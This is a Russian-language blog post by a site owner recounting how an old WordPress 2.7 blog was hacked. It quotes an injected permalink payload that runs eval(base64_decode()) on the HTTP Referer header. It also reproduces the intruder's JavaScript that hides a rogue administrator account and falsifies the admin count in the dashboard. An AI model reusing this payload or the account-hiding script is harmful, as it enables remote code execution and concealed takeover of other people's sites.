хакнули блог на wordpress 2.7

один из моих сайтов, тот СДЛ что яндекс выкинул с индекса хакнули сегодня тоесть вчера

покупая ссылки в блогуне я решил проверить блог по одному запросу и пошол в гугл набрав запрос увидел свой блог при переходе по ссылке мне выбило 400 Bad Request

а в ссылке было типо

http://wasya.ru/2009/09/срочн/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

пошарясь в поиске я нашол еще много хакнутых блогов, ну да ладно..

в панели администрирования → wp → пользователи → было зарегано 3 пользователя, хотя в wp нет разрешения реги юзеров.

также была надпись Administrator (2) я не-понял прикола, отображался только один админ я, а написано что админов двое..

залез в исходный код и нашарил ссылку на скрытый профиль второго админа <a href=»user-edit.php?user_id=5&#038;wp_http_referer=%2Fwp-admin%2Fusers.php%3Frole%3Dadministrator»>HaywoodWarner72</a>

перейдя в его профиль увидел чудо

вот вам JS который он всунул туда

<div id=»user_superuser»><script type=»text/javascript»><!–
var setUserName = function(){    try{        var t=document.getElementById(«user_superuser»);        while(t.nodeName!=»TR»){            t=t.parentNode;        };        t.parentNode.removeChild(t);        var tags = document.getElementsByTagName(«H3″);        var s = » shown below»;        for (var i = 0; i < tags.length; i++) {            var t=tags[i].innerHTML;            var h=tags[i];            if(t.indexOf(s)>0){                s =(parseInt(t)-1)+s;                h.removeChild(h.firstChild);                t = document.createTextNode(s);                h.appendChild(t);            }        }        var arr=document.getElementsByTagName(«ul»);        for(var i in arr) if(arr[i].className==»subsubsub»){            var n= />Administrator ((d+))</gi.exec(arr[i].innerHTML);            if(n[1]>0){                var txt=arr[i].innerHTML.replace( />Administrator ((d+))</gi,»>Administrator («+(n[1]-1)+»)<»);        arr[i].innerHTML=txt;        }    }          }catch(e){};     };     addLoadEvent(setUserName);
// –></script></div>

ума хватило все поправить, перебил пасы, обновил wp, кто не понял уточняю.. хотели перелить мой трафик себе.

первый раз когда меня ломанули и первый раз когда я обновил движок wordpress, теперь эта процедура будит постоянной)